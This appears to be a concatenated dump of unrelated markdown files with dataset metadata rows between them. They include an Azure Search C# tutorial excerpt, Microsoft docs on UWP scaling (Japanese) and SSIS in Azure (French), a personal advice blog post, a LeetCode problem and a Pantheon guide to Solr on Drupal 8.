var parameters = new SearchParameters
{
// Set the ordering/scoring parameters.
OrderBy = orderby,
ScoringProfile = profile,
ScoringParameters = scoringParams,
// Select the data properties to be returned.
Select = new[] { "HotelName", "Description", "Tags", "Rooms", "Rating", "LastRenovationDate" },
SearchMode = SearchMode.All,
// Skip past results that have already been returned.
Skip = page * GlobalVariables.ResultsPerPage,
// Take only the next page worth of results.
Top = GlobalVariables.ResultsPerPage,
// Include the total number of results.
IncludeTotalResultCount = true,
};
// For efficiency, the search call should be asynchronous, so use SearchAsync rather than Search.
model.resultList = await _indexClient.Documents.SearchAsync<Hotel>(model.searchText, parameters);
// Ensure TempData is stored for the next call.
TempData["page"] = page;
TempData["searchfor"] = model.searchText;
TempData["scoring"] = model.scoring;
SaveFacets(model,true);
// Calculate the room rate ranges.
for (int n = 0; n < model.resultList.Results.Count; n++)
{
var cheapest = 0d;
var expensive = 0d;
for (var r = 0; r < model.resultList.Results[n].Document.Rooms.Length; r++)
{
var rate = model.resultList.Results[n].Document.Rooms[r].BaseRate;
if (rate < cheapest || cheapest == 0)
{
cheapest = (double)rate;
}
if (rate > expensive)
{
expensive = (double)rate;
}
}
model.resultList.Results[n].Document.cheapest = cheapest;
model.resultList.Results[n].Document.expensive = expensive;
}
}
catch
{
return View("Error", new ErrorViewModel { RequestId = "1" });
}
return View("Index", model);
}
```
Read through the comments for each of the **switch** options.
5. No changes to the **Next** action are needed, provided you added the code for ordering based on multiple properties in the earlier section of this tutorial.
### <a name="run-and-test-the-app"></a>Run and test the app
1. Run the app. You should see a full set of amenities in the view.
2. For ordering, selecting "By numerical Rating" gives you the numerical ordering you have already implemented in this tutorial, selecting on renovation date among hotels with equal ratings.

3. Now try the "By Amenities" profile. Make various selections of amenities, and verify that hotels with those amenities are promoted up the results list.

4. Try the "By Renovated date/Rating profile" to see if you get what you expect. Only recently renovated hotels should receive a _freshness_ boost.
### <a name="resources"></a>Resources
For more information, see [Add scoring profiles to an Azure Search index](https://docs.microsoft.com/azure/search/index-add-scoring-profiles).
## <a name="takeaways"></a>Takeaways
Consider the following takeaways from this project:
* Users will expect search results to be ordered, most relevant first.
* Data needs to be structured so that ordering is easy. We were not able to sort on "cheapest" room rate easily, because the data is not structured to enable sorting without additional code.
* There can be many levels to ordering, to differentiate between results that have the same value at a higher level of ordering.
* It is natural for some results to be ordered in ascending order (say, distance from a point), and some in descending order (say, guest rating).
* Scoring profiles can be defined when numerical comparisons are not available, or are not smart enough, for a data set. Scoring each result helps order and display results intelligently.
## <a name="next-steps"></a>Next steps
You have completed this series of C# tutorials, and should have gained valuable knowledge of the Azure Search APIs.
For further reference and tutorials, consider browsing [Microsoft Learn](https://docs.microsoft.com/learn/browse/?products=azure), or the other tutorials in the [Azure Search documentation](https://docs.microsoft.com/azure/search/).
| 48.696008 | 736 | 0.580755 | hun_Latn | 0.999308 |
9786a21ddb10c4b1eb577e1d40aa1663e6e069d2 | 546 | md | Markdown | content/links/2022-02-22-20-45-leaders-show-their-work.md | ys/brain | 8e6c696dfef5eaa2cbce781c70547a1ade493a36 | [
"MIT"
] | null | null | null | content/links/2022-02-22-20-45-leaders-show-their-work.md | ys/brain | 8e6c696dfef5eaa2cbce781c70547a1ade493a36 | [
"MIT"
] | null | null | null | content/links/2022-02-22-20-45-leaders-show-their-work.md | ys/brain | 8e6c696dfef5eaa2cbce781c70547a1ade493a36 | [
"MIT"
] | null | null | null | ---
uuid: a70cf4aa-3c94-49b3-a198-55c03d7cd74c
link: https://ben.balter.com/2022/02/16/leaders-show-their-work/
category: article
headImage:
title: Leaders show their work
description: Absent working within systems that naturally capture and expose process,
transparency takes effort. Leaders should hold one another accountable for spending
the additional cycles to show their work through communicating not only what decision
was made, but also how the decision was made, and why.
tags: []
date: 2022-02-22 20:45:53.022063195 +00:00
---
| 39 | 87 | 0.783883 | eng_Latn | 0.998352 |
9786eb112e43cd11057217feaae784d2a6374b64 | 1,426 | md | Markdown | windows-apps-src/xbox-apps/disable-scaling.md | yoichinak/windows-uwp.ja-jp | 51502bb8eb5019c8da251091681058319ef2cc96 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-apps-src/xbox-apps/disable-scaling.md | yoichinak/windows-uwp.ja-jp | 51502bb8eb5019c8da251091681058319ef2cc96 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-apps-src/xbox-apps/disable-scaling.md | yoichinak/windows-uwp.ja-jp | 51502bb8eb5019c8da251091681058319ef2cc96 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: スケーリングを無効にする方法
description: 既定のスケールファクターをオフにして、アプリケーションで実際の 1910 x 1080 ピクセルデバイスディメンションを使用する方法について説明します。
ms.date: 02/08/2017
ms.topic: article
keywords: windows 10, uwp
ms.assetid: 6e68c1fc-a407-4c0b-b0f4-e445ccb72ff3
ms.localizationpriority: medium
ms.openlocfilehash: 404bdd9a4b25254c1941928dbfb0b548492f03a5
ms.sourcegitcommit: 7b2febddb3e8a17c9ab158abcdd2a59ce126661c
ms.translationtype: MT
ms.contentlocale: ja-JP
ms.lasthandoff: 08/31/2020
ms.locfileid: "89174706"
---
# <a name="how-to-turn-off-scaling"></a>スケーリングを無効にする方法
アプリケーションは既定で、XAML アプリの場合は 200% に、HTML アプリの場合は 150% に拡大されます。 また、既定の倍率を無効にすることもできます。 これにより、アプリケーションをデバイスの実際のピクセル サイズ (1910 x 1080 ピクセル) で使うことができるようになります。
## <a name="html"></a>HTML
次のコード スニペットを使って拡大縮小率を無効にすることができます。
```
var result = Windows.UI.ViewManagement.ApplicationViewScaling.trySetDisableLayoutScaling(true);
```
また、Web 対応の次の方法を使うこともできます。
```
@media (max-height: 1080px) {
@-ms-viewport {
height: 1080px;
}
}
```
## <a name="xaml"></a>XAML
次のコード スニペットを使って拡大縮小率を無効にすることができます。
```
bool result = Windows.UI.ViewManagement.ApplicationViewScaling.TrySetDisableLayoutScaling(true);
```
## <a name="directxc"></a>DirectX/C++
DirectX/C++ アプリケーションはスケーリングされません。 自動スケーリングは、HTML アプリケーションと XAML アプリケーションにのみ適用されます。
## <a name="see-also"></a>関連項目
- [Xbox のベスト プラクティス](tailoring-for-xbox.md)
- [Xbox One の UWP](index.md)
| 29.102041 | 154 | 0.742637 | yue_Hant | 0.564303 |
9787ece5ad822762b4639967546fa98e1e8f9193 | 3,102 | md | Markdown | _posts/2021-9-15-If-You-Weren't.md | markzxu/hacker-blog | dc80f7bbe79bb5b99c8ef6f9931cfc98818d7d02 | [
"CC0-1.0"
] | 2 | 2020-12-15T22:21:31.000Z | 2021-08-09T23:12:05.000Z | _posts/2021-9-15-If-You-Weren't.md | markzxu/hacker-blog | dc80f7bbe79bb5b99c8ef6f9931cfc98818d7d02 | [
"CC0-1.0"
] | null | null | null | _posts/2021-9-15-If-You-Weren't.md | markzxu/hacker-blog | dc80f7bbe79bb5b99c8ef6f9931cfc98818d7d02 | [
"CC0-1.0"
] | 2 | 2022-02-27T04:42:33.000Z | 2022-02-27T04:47:13.000Z | ---
title: If you weren't such an idiot...
---
My friend Buck once told me that he often had interactions with me that felt like I was saying "If you weren't such a fucking idiot, you would obviously do..." Here's a list of such advice in that spirit.
Note that if you do/don't do these things, I'm *technically* calling you an idiot, but I do/don't do a bunch of them too. We can be idiots together.
If you weren't such a fucking idiot...
* You would have multiple copies of any object that would make you sad if you didn't have it
* Examples: ear plugs, melatonin, eye masks, hats, sun glasses, various foods, possibly computers, etc.
* You would spend money on goods and services.
* Examples of goods: faster computer, monitor, keyboard, various tasty foods, higher quality clothing, standing desk, decorations for your room, mattress, pillow, sheets, etc.
* Examples of services: uber, doordash, cleaners, personal assistants, editors, house managers, laundry, etc.
* You would have tried many things at least one time.
* Examples of things to do: climbing, singing, listening to music, playing instruments, dancing, eating various types of food, writing, parties.
* You wouldn't do anything absurdly dangerous, like take unknown drugs or ride a bike without a helmet.
* You wouldn't take irreversible actions if you didn't know what the fuck you were doing.
* You would exercise frequently.
* Types of exercise to try: climbing, walking, running, soccer, football, yoga, hiking, fencing, swimming, wrestling, beat saber, etc.
* You would reliably sleep 6-9 hours a night.
* Obvious things to try:
* melatonin
* blackout curtains
* putting black tape over LEDs on electronics
* experimenting with mattress, pillow, blankets, sheets, etc.
* blue light blocking glasses
* You would routinely look up key numbers and do numerical consistency checks during thinking.
* You would have a password manager.
* You would invest money in yourself.
* Recall: money can be used to buy goods and services.
* You would use a email's subject line to succinctly describe what you want from the person.
* For example, if I want to meet with my advisor, I'll send an email with the subject "Request for Advisory Meeting" or something similar. If I want someone to read a draft of something I wrote, the subject would be "Request for Feedback on \<Title\>".
* You would have a good mentor.
* One way to do this is to email people that you want to be your mentor with the subject "Request for Mentorship".
* You would drink lots of water.
* You would take notes in a searchable database.
* You would summarize things that you read.
* You would have tried making your room as bright as the outdoors.
* You would carry batteries to recharge your phone.
* You would have tried using pens with multiple colors.
* You would read textbooks instead of popular introductions.
* You would put a relatively consistent dollar value on your time.
I'm sure there are more things that I tell people that can be prefaced with "if you weren't such an idiot...", but that's all I got for now. | 67.434783 | 254 | 0.755964 | eng_Latn | 0.999599 |
978a89398c4d6d258d38215599cbbdc786c28463 | 404 | md | Markdown | io/dict/data/grey/README.md | gnames/gnfinder | e80e20c0b79c036d6529646d2189aa20b657b0d5 | [
"MIT"
] | 27 | 2017-11-28T19:57:34.000Z | 2022-01-07T01:10:34.000Z | io/dict/data/grey/README.md | gnames/gnfinder | e80e20c0b79c036d6529646d2189aa20b657b0d5 | [
"MIT"
] | 148 | 2017-10-26T10:11:57.000Z | 2022-03-18T16:03:56.000Z | io/dict/data/grey/README.md | gnames/gnfinder | e80e20c0b79c036d6529646d2189aa20b657b0d5 | [
"MIT"
] | 5 | 2017-11-24T23:59:39.000Z | 2021-03-11T15:07:39.000Z | "Grey" dictionaries
-------------------
`genera.txt`
Contains ambiguous genera and their species. The idea is to use them together
so if there is a known species with ambiguous genera -- we assume it is a real
name
`species.txt`
List of all ambiguous species names. We would assume they are real species if
they appear together with known genus
`uninomials.txt`
List of 3 ambiguous uninomial names
| 22.444444 | 78 | 0.74505 | eng_Latn | 0.999783 |
978b08192535ea18f507d02e46d9825d43448dc9 | 1,015 | md | Markdown | questions/Algorithms/0168. Excel Sheet Column Title/README.md | 6leetcode/6leetcode | b1fac95238a55a36f08531af5e04485d0cd21006 | [
"MIT"
] | 9 | 2019-08-15T05:09:40.000Z | 2021-05-01T09:26:59.000Z | questions/Algorithms/0168. Excel Sheet Column Title/README.md | 6leetcode/6leetcode | b1fac95238a55a36f08531af5e04485d0cd21006 | [
"MIT"
] | 135 | 2019-09-26T03:40:11.000Z | 2022-02-02T04:15:39.000Z | questions/Algorithms/0168. Excel Sheet Column Title/README.md | 6leetcode/6leetcode | b1fac95238a55a36f08531af5e04485d0cd21006 | [
"MIT"
] | 1 | 2022-01-05T01:43:17.000Z | 2022-01-05T01:43:17.000Z | ### [Excel Sheet Column Title](https://leetcode.com/problems/excel-sheet-column-title)
<p>Given an integer <code>columnNumber</code>, return <em>its corresponding column title as it appears in an Excel sheet</em>.</p>
<p>For example:</p>
<pre>
A -> 1
B -> 2
C -> 3
...
Z -> 26
AA -> 27
AB -> 28
...
</pre>
<p> </p>
<p><strong>Example 1:</strong></p>
<pre>
<strong>Input:</strong> columnNumber = 1
<strong>Output:</strong> "A"
</pre>
<p><strong>Example 2:</strong></p>
<pre>
<strong>Input:</strong> columnNumber = 28
<strong>Output:</strong> "AB"
</pre>
<p><strong>Example 3:</strong></p>
<pre>
<strong>Input:</strong> columnNumber = 701
<strong>Output:</strong> "ZY"
</pre>
<p><strong>Example 4:</strong></p>
<pre>
<strong>Input:</strong> columnNumber = 2147483647
<strong>Output:</strong> "FXSHRXW"
</pre>
<p> </p>
<p><strong>Constraints:</strong></p>
<ul>
<li><code>1 <= columnNumber <= 2<sup>31</sup> - 1</code></li>
</ul>
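A minimal conversion sketch (ours, not part of the original question file), relying on the shift to a 0-based digit that the A -> 1 mapping implies:
```cs
using System.Text;

public class Solution {
    public string ConvertToTitle(int columnNumber) {
        var sb = new StringBuilder();
        while (columnNumber > 0) {
            columnNumber--;                       // map 1..26 onto 0..25
            sb.Insert(0, (char)('A' + columnNumber % 26));
            columnNumber /= 26;
        }
        return sb.ToString();
    }
}
```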
| 19.150943 | 130 | 0.641379 | eng_Latn | 0.181133 |
978b3b9a4e8b8faa2702bb955c054906cfdb60fd | 13,969 | md | Markdown | docs/integration-services/lift-shift/ssis-azure-lift-shift-ssis-packages-overview.md | zelanko/sql-docs.fr-fr | 27bf5ccdbf98932e6c384c58b7fecf37fc525190 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/integration-services/lift-shift/ssis-azure-lift-shift-ssis-packages-overview.md | zelanko/sql-docs.fr-fr | 27bf5ccdbf98932e6c384c58b7fecf37fc525190 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/integration-services/lift-shift/ssis-azure-lift-shift-ssis-packages-overview.md | zelanko/sql-docs.fr-fr | 27bf5ccdbf98932e6c384c58b7fecf37fc525190 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Deploy and run SSIS packages in Azure | Microsoft Docs
description: Learn how you can move your SQL Server Integration Services (SSIS) projects, packages, and workloads to the Microsoft Azure cloud.
ms.date: 09/23/2018
ms.topic: conceptual
ms.prod: sql
ms.prod_service: integration-services
ms.custom: ''
ms.technology: integration-services
author: swinarko
ms.author: sawinark
ms.reviewer: maghan
ms.openlocfilehash: 7a962b29d6af2caf48f32eec5bc7e77bef3b126f
ms.sourcegitcommit: cfa04a73b26312bf18d8f6296891679166e2754d
ms.translationtype: HT
ms.contentlocale: fr-FR
ms.lasthandoff: 10/19/2020
ms.locfileid: "92194044"
---
# <a name="lift-and-shift-sql-server-integration-services-workloads-to-the-cloud"></a>Lift and shift SQL Server Integration Services workloads to the cloud
[!INCLUDE[sqlserver-ssis](../../includes/applies-to-version/sqlserver-ssis.md)]
You can now move your SQL Server Integration Services (SSIS) projects, packages, and workloads to the Azure cloud. Deploy, run, and manage SSIS projects and packages in the SSIS Catalog (SSISDB) on Azure SQL Database or SQL Managed Instance with familiar tools such as SQL Server Management Studio (SSMS).
## <a name="benefits"></a>Benefits
Moving your on-premises SSIS workloads to Azure has the following potential benefits:
- **Reduce operational costs** and the burden of managing infrastructure that you have when you run SSIS on premises or on Azure virtual machines.
- **Increase high availability** with the ability to specify multiple nodes per cluster, as well as the high availability features of Azure and of Azure SQL Database.
- **Increase scalability** with the ability to specify multiple cores per node (scale up) and multiple nodes per cluster (scale out).
## <a name="architecture-of-ssis-on-azure"></a>Architecture of SSIS on Azure
The following table highlights the differences between SSIS on premises and SSIS on Azure.
The most significant difference is the separation of storage and execution. Azure Data Factory hosts the runtime engine for SSIS packages on Azure. The runtime engine is called the Azure-SSIS Integration Runtime (Azure-SSIS IR). For more info, see [Azure-SSIS Integration Runtime](/azure/data-factory/concepts-integration-runtime#azure-ssis-integration-runtime).
| Location | Storage | Runtime | Scalability |
|---|---|---|---|
| On premises | SQL Server | SSIS runtime hosted by SQL Server | SSIS Scale Out (in SQL Server 2017 and later)<br/><br/>Custom solutions (in prior versions of SQL Server) |
| On Azure | SQL Database or SQL Managed Instance | Azure-SSIS Integration Runtime, a component of Azure Data Factory | Scaling options for the Azure-SSIS Integration Runtime |
| | | | |
## <a name="provision-ssis-on-azure"></a>Provision SSIS on Azure
**Provision**. Before you can deploy and run SSIS packages in Azure, you have to provision the SSIS Catalog (SSISDB) and the Azure-SSIS Integration Runtime.
- To provision SSIS on Azure in the Azure portal, follow the provisioning steps in this article: [Provision the Azure-SSIS Integration Runtime in Azure Data Factory](/azure/data-factory/tutorial-deploy-ssis-packages-azure).
- To provision SSIS on Azure with PowerShell, follow the provisioning steps in this article: [Provision the Azure-SSIS Integration Runtime in Azure Data Factory with PowerShell](/azure/data-factory/tutorial-deploy-ssis-packages-azure-powershell).
You only have to provision the Azure-SSIS IR one time. After that, you can use familiar tools such as SQL Server Data Tools (SSDT) and SQL Server Management Studio (SSMS) to deploy, configure, run, monitor, schedule, and manage packages.
> [!NOTE]
> The Azure-SSIS Integration Runtime is not yet available in all Azure regions. For info about the supported regions, see [Products available by region - Microsoft Azure](https://azure.microsoft.com/regions/services/).
**Scale up and scale out**. When you provision the Azure-SSIS IR, you can scale up and scale out by specifying values for the following options:
- The node size (including the number of cores) and the number of nodes in the cluster.
- The existing instance of Azure SQL Database to host the SSIS Catalog Database (SSISDB), and the service tier for the database.
- The maximum parallel executions per node.
**Improve performance**. For more info, see [Configure the Azure-SSIS Integration Runtime for high performance](/azure/data-factory/configure-azure-ssis-integration-runtime-performance).
**Reduce costs**. To reduce costs, run the Azure-SSIS IR only when you need it. For more info, see [How to schedule starting and stopping of an Azure-SSIS integration runtime](/azure/data-factory/how-to-schedule-azure-ssis-integration-runtime).
## <a name="design-packages"></a>Design packages
You continue to **design and build packages** on premises in SSDT, or in Visual Studio with SSDT installed.
### <a name="connect-to-data-sources"></a>Connect to data sources
To connect to on-premises data sources from the cloud with **Windows authentication**, see [Connect to data sources and file shares with Windows Authentication from SSIS packages in Azure](/azure/data-factory/ssis-azure-connect-with-windows-auth).
To connect to files and file shares, see [Open and save files on premises and in Azure with SSIS packages deployed in Azure](/azure/data-factory/ssis-azure-files-file-shares).
### <a name="available-ssis-components"></a>Available SSIS components
When you provision an instance of SQL Database to host SSISDB, the Azure Feature Pack for SSIS and the Access Redistributable are also installed. These components provide connectivity to various **Azure** data sources and to **Excel and Access** files, in addition to the data sources supported by the built-in components.
You can also install additional components. For example, you can install a driver that is not installed by default. For more info, see [Customize setup for the Azure-SSIS integration runtime](/azure/data-factory/how-to-configure-azure-ssis-ir-custom-setup).
Additional components are available to holders of an Enterprise Edition license. For more info, see [Provision Enterprise Edition for the Azure-SSIS Integration Runtime](/azure/data-factory/how-to-configure-azure-ssis-ir-enterprise-edition).
If you are an ISV, you can update the installation of your licensed components to make them available on Azure. For more info, see [Install paid or licensed custom components for the Azure-SSIS integration runtime](/azure/data-factory/how-to-develop-azure-ssis-ir-licensed-components).
### <a name="transaction-support"></a>Transaction support
With SQL Server on premises and on Azure virtual machines, you can use Microsoft Distributed Transaction Coordinator (MSDTC) transactions. To configure MSDTC on each node of the Azure-SSIS IR, use the custom setup capability. For more info, see [Custom setup for the Azure-SSIS integration runtime](/azure/data-factory/how-to-configure-azure-ssis-ir-custom-setup).
With Azure SQL Database, you can only use elastic transactions. For more info, see [Distributed transactions across cloud databases](/azure/sql-database/sql-database-elastic-transactions-overview).
## <a name="deploy-and-run-packages"></a>Déployer et exécuter des packages
Pour commencer, consultez [Tutoriel : Déployer et exécuter un package SQL Server Integration Services (SSIS) sur Azure](ssis-azure-deploy-run-monitor-tutorial.md).
### <a name="prerequisites"></a>Prérequis
Pour déployer des packages SSIS sur Azure, vous devez avoir l’une des versions suivantes de SQL Server Data Tools (SSDT) :
- Pour Visual Studio 2017, version 15.3 ou ultérieure.
- Pour Visual Studio 2015, version 17.2 ou version ultérieure.
### <a name="connect-to-ssisdb"></a>Se connecter à SSISDB
Le **nom de l’instance SQL Database** qui héberge SSISDB devient la première partie du nom en quatre parties à utiliser quand vous déployez et exécutez des packages à partir de SSDT et SSMS, au format suivant : `<sql_database_name>.database.windows.net`. Pour plus d’informations sur la connexion à la base de données du catalogue SSIS sur Azure, voir [Se connecter au catalogue SSIS (SSISDB) sur Azure](ssis-azure-connect-to-catalog-database.md).
### <a name="deploy-projects-and-packages"></a>Déployer des projets et des packages
Vous devez utiliser le **modèle de déploiement de projet**, et non le modèle de déploiement de package, quand vous déployez des projets dans SSISDB sur Azure.
Pour déployer des projets sur Azure, vous pouvez utiliser plusieurs outils et options de script de votre choix :
- SQL Server Management Studio (SSMS)
- Transact-SQL (à partir de SSMS, Visual Studio Code ou tout autre outil)
- Un outil en ligne de commande
- PowerShell ou C# et le modèle objet de gestion SSIS
Le processus de déploiement valide chaque package pour vérifier qu’il peut s’exécuter dans Azure SSIS Integration Runtime. Pour plus d’informations, voir [Valider les packages SQL Server Integration Services (SSIS) déployés sur Azure](ssis-azure-validate-packages.md).
Pour obtenir un exemple de déploiement qui utilise SSMS et l’Assistant Déploiement d’Integration Services, consultez [Didacticiel : Déployer et exécuter un package SQL Server Integration Services (SSIS) sur Azure](ssis-azure-deploy-run-monitor-tutorial.md).
### <a name="version-support"></a>Prise en charge de la version
Vous pouvez déployer n’importe quel package créé avec l’une des versions de SSIS sur Azure. Quand vous déployez un package sur Azure sans erreur de validation, le package est automatiquement mis à niveau avec le dernier format de package. Le package est donc toujours mis à niveau avec la dernière version de SSIS.
### <a name="run-packages"></a>Exécuter des packages
Il existe différents moyens d’exécuter des packages SSIS déployés sur Azure. Pour plus d’informations, voir [Exécuter des packages SQL Server Integration Services (SSIS) déployés sur Azure](ssis-azure-run-packages.md).
### <a name="run-packages-in-an-azure-data-factory-pipeline"></a>Exécuter des packages dans un pipeline Azure Data Factory
Pour exécuter un package SSIS dans un pipeline Azure Data Factory, utilisez l’activité Exécuter un package SSIS. Pour plus d’informations, consultez [Exécuter un package SSIS à l’aide de l’activité Exécuter le package SSIS dans Azure Data Factory](/azure/data-factory/how-to-invoke-ssis-package-ssis-activity).
Lorsque vous exécutez un package dans un pipeline Data Factory avec l’activité Exécuter un package SSIS, vous pouvez transmettre des valeurs au package à l’exécution. Pour transmettre une ou plusieurs valeurs de runtime, créez des environnements d’exécution SSIS dans SSISDB avec SQL Server Management Studio (SSMS). Dans chaque environnement, créez des variables et affectez des valeurs qui correspondent aux paramètres de vos projets ou packages. Configurez vos packages SSIS dans SSMS pour associer ces variables d’environnement aux paramètres de votre projet ou package. Quand vous exécutez les packages dans le pipeline, vous pouvez passer d’un environnement à un autre en spécifiant différents chemins d’environnement sous l’onglet Paramètres de l’interface utilisateur de l’activité Exécuter un package SSIS. Pour plus d’informations sur les environnements SSIS, voir [Créer et mapper un environnement serveur](../packages/deploy-integration-services-ssis-projects-and-packages.md#create-and-map-a-server-environment).
## <a name="monitor-packages"></a>Surveiller les packages
Pour effectuer le monitoring des packages en cours d’exécution, utilisez les options de création de rapports suivantes dans SSMS.
- Cliquez avec le bouton droit sur **SSISDB**, puis sélectionnez **Opérations actives** pour ouvrir la boîte de dialogue **Opérations actives**.
- Sélectionnez un package dans l’Explorateur d’objets, cliquez avec le bouton droit, sélectionnez **Rapports**, **Rapports standard**, puis **Toutes les exécutions**.
Pour surveiller Azure-SSIS Integration Runtime, consultez [Surveiller le runtime d’intégration Azure-SSIS](/azure/data-factory/monitor-integration-runtime#azure-ssis-integration-runtime).
## <a name="schedule-packages"></a>Planifier les packages
Il existe différents outils permettant de planifier l’exécution de packages déployés sur Azure. Pour plus d’informations, voir [Planifier l’exécution de packages SQL Server Integration Services (SSIS) déployés sur Azure](ssis-azure-schedule-packages.md).
## <a name="next-steps"></a>Étapes suivantes
Pour bien démarrer avec les charges de travail SSIS sur Azure, consultez les articles suivants :
- [Tutoriel : Déployer et exécuter un package SQL Server Integration Services (SSIS) sur Azure](ssis-azure-deploy-run-monitor-tutorial.md)
- [Configurer Azure-SSIS Integration Runtime dans Azure Data Factory](/azure/data-factory/tutorial-deploy-ssis-packages-azure) | 94.385135 | 1,025 | 0.796048 | fra_Latn | 0.96188 |
978b4017eab07eb68519cb03f007388ca94fbafe | 7,892 | md | Markdown | source/content/guides/solr-drupal/03-solr-drupal-8.md | audra-n-c/documentation | e94a36dda787a5ab31e2a1ace3f7f5dfe7e4797b | [
"MIT"
] | 1 | 2021-09-06T05:11:46.000Z | 2021-09-06T05:11:46.000Z | source/content/guides/solr-drupal/03-solr-drupal-8.md | MGBtrust/documentation | 362f954e5346a8fd66b0da939e5ab73a059f7799 | [
"MIT"
] | null | null | null | source/content/guides/solr-drupal/03-solr-drupal-8.md | MGBtrust/documentation | 362f954e5346a8fd66b0da939e5ab73a059f7799 | [
"MIT"
] | null | null | null | ---
title: Apache Solr for Drupal
subtitle: Using Solr on Drupal 8
description: Detailed information on using Apache Solr with Drupal 8.
cms: "Drupal 8"
categories: [integrate]
tags: [solr, search, modules]
contributors: [peter-pantheon, cityofoaksdesign]
layout: guide
showtoc: true
permalink: docs/guides/solr-drupal/solr-drupal-8
anchorid: solr-drupal
editpath: solr-drupal/03-solr-drupal-8.md
---
<Alert title="Important Note" type="info">
**Pantheon Search** derives from Solr and can perform full-text content searching in a single language.
<Partial file="solr-version.md" />
If your search needs include geospatial search, emojis, or multilingual search, consider [OpenSolr](/opensolr) or another alternative search.
Pantheon Search supports [Search API Solr 8.x-1.x](https://www.drupal.org/project/search_api_solr), which reached end-of-life in December 2021. Search API Solr 8.x-1.x should continue to work as long as the Search API Pantheon module is also being used, following the installation directions below.
</Alert>
## Before You Begin
Be sure that you:
- Enable Solr in the Pantheon Site Dashboard: **Settings** > **Add Ons** > **Apache Solr Index Server: Add**.
- Install [Composer](https://getcomposer.org/)
- Create a Composer managed site on Pantheon following the [Build Tools](/guides/build-tools) guide, or [convert an existing Drupal site to use Composer](/guides/composer-convert) guide.
<Alert title="Warning" type="danger">
Solr on Drupal 8 requires a Composer-managed workflow, as described in our [Build Tools](/guides/build-tools) and [Convert to Composer](/guides/composer-convert) guides. Since one module relies on [Solarium](http://www.solarium-project.org/), an external library, in addition to Composer's autoloader, we cannot support non-Composer workflows for Solr on Drupal 8. For details, see [this Drupal.org issue](https://www.drupal.org/node/2858750).
</Alert>
## Install Solr on Drupal 8
### Install the Search API Pantheon Module
1. Navigate to the project's root directory on your local computer. If you have access to [Multidev](/multidev), checkout a new branch from master:
```bash{promptUser: user}
git checkout -b solr master
```
Otherwise, continue from the master branch.
1. Add the Search API Pantheon module as a required dependency:
```bash{promptUser: user}
composer require "drupal/search_api_pantheon ~1.0" --prefer-dist
```
1. You should now have the Search API Pantheon module installed along with its dependencies. Run `git status` to make sure you see the expected result. Commit and push the changes:
<TabList>
<Tab title="Without Multidev" id="install-nomulti" active={true}>
```bash{promptUser: user}
git commit -am "Require drupal/search_api_pantheon ~1.0"
git push origin master
```
</Tab>
<Tab title="With Multidev" id="install-multidev">
```bash{promptUser: user}
git commit -am "Require drupal/search_api_pantheon ~1.0"
git push origin solr
terminus multidev:create <site>.dev solr
```
</Tab>
</TabList>
## Configure Solr
To configure the connection with Pantheon, set the [connection mode](/sftp/#sftp-mode) to SFTP and complete the following steps.
### Enable Modules
Enable the Search API Pantheon module via the [Drupal interface](https://www.drupal.org/docs/8/extending-drupal-8/installing-contributed-modules-find-import-enable-configure-drupal-8#enable_your_mod). When prompted, click **Continue** to enable the [Search API](https://www.drupal.org/project/search_api) and [Search API Solr](https://www.drupal.org/project/search_api_solr) modules:
### Disable Drupal Core's Search Module (Optional)
If you are using Search API, then you probably will not be using Drupal Core's Search module. Uninstall the Search core module from `/admin/modules/uninstall` to avoid confusion in further configuration steps.
### Add The Search Server
Navigate to `/admin/config/search/search-api/add-server` and configure the following, then click **Save**:
- Server name: Pantheon
- Backend: Solr
- Solr Connector: Pantheon
- Schema file: `modules/search_api_solr/solr-conf/4.x/schema.xml` (recommended)
You can name the server anything you want but using something like "Pantheon" is a good way to remember where the connection goes. The Search API module provides schema files for each version of Solr (4, 5, and 6). You can customize schema files by copying these examples to your own custom module and editing them. If you are just getting started, we recommend selecting the file for Solr 4.
When deploying Solr to other environments (Test/Live/Multidevs) for the first time, first navigate to your Server settings page at `admin/config/search/search-api/server/pantheon/edit` and click **Save**, so you can post the Solr schema in those environments.
### Add Search Index
Navigate to `admin/config/search/search-api/add-index` and name your index, then choose a data source. If this is your first time using Search API, start by selecting **Content** as a data source. This option will index articles, basic pages, and other node types you have configured.
Select **Pantheon** as the server, then click **Save and add fields**. Add fields to be included in the index and click **Done**.
After adding fields the configuration, make sure the index is full by clicking **Index now** or by running cron.
### Export Configuration
It is a best practice in Drupal 8 to export your changes to `yml` files. You can quickly export configuration changes via [Terminus](/terminus):
```bash{promptUser: user}
terminus drush site.env -- config-export -y
```
Replace `site` and `env` with your site name and the environment (Dev, Multidev, etc), respectively.
### Search the Index
To actually search your index you will need a module like [Search API Pages](https://www.drupal.org/project/search_api_page), which allows for the configuration of search forms on their own pages.
## Solr Versions and Schemas
The version of Solr on Pantheon is Apache Solr v3.6. To accommodate this older version of Solr, use the `8.x-1.x` branch of [Search API Solr](https://www.drupal.org/project/search_api_solr) and its Solr 4 schema file.
<Partial file="solr-commit-changes.md" />
## Extend Solr for Drupal 8
### Apache Tika
The [Apache Tika](https://tika.apache.org/) toolkit detects and extracts metadata and structured text content from various documents using existing parser libraries.
Tika can extract content from a number of document formats such as HTML, XML, Microsoft Office document formats, and PDFs and more.
Download and install the Search API Attachments module ([search_api_attachments](https://www.drupal.org/project/search_api_attachments)), then configure the module's settings.
1. Go to the Search API Attachments settings page at: `/admin/config/search/search_api_attachments` and edit the following fields:
- **Extraction method:** Tika Extractor
- **Path to java executable:** `java`
- **Path to Tika .jar file:** `/srv/bin/tika-app-1.18.jar`
1. Verify that your site is able to extract text from documents. Click **Submit and test extraction**.
If everything is working correctly, the message "Extracted data: Congratulations! The extraction seems to be working! Yay!" will be displayed.
## Safely Remove Solr
The following code changes are required before Solr can be safely uninstalled and disabled:
<Partial file="remove-addons/d8-solr.md" />
## Troubleshooting
### Solr Verification Check
Because we are posting the 4.x schema to a 3.x Solr instance, the schema verification check can fail and prevent indexing. You can disable the schema check by checking the **Skip schema verification** box in the UI, or pulling [this patch](https://www.drupal.org/project/search_api_solr/issues/3037213#comment-12996162) to the module.
## See Also
- [Search API Docs](https://www.drupal.org/node/1250878).
| 44.337079 | 443 | 0.760644 | eng_Latn | 0.956779 |
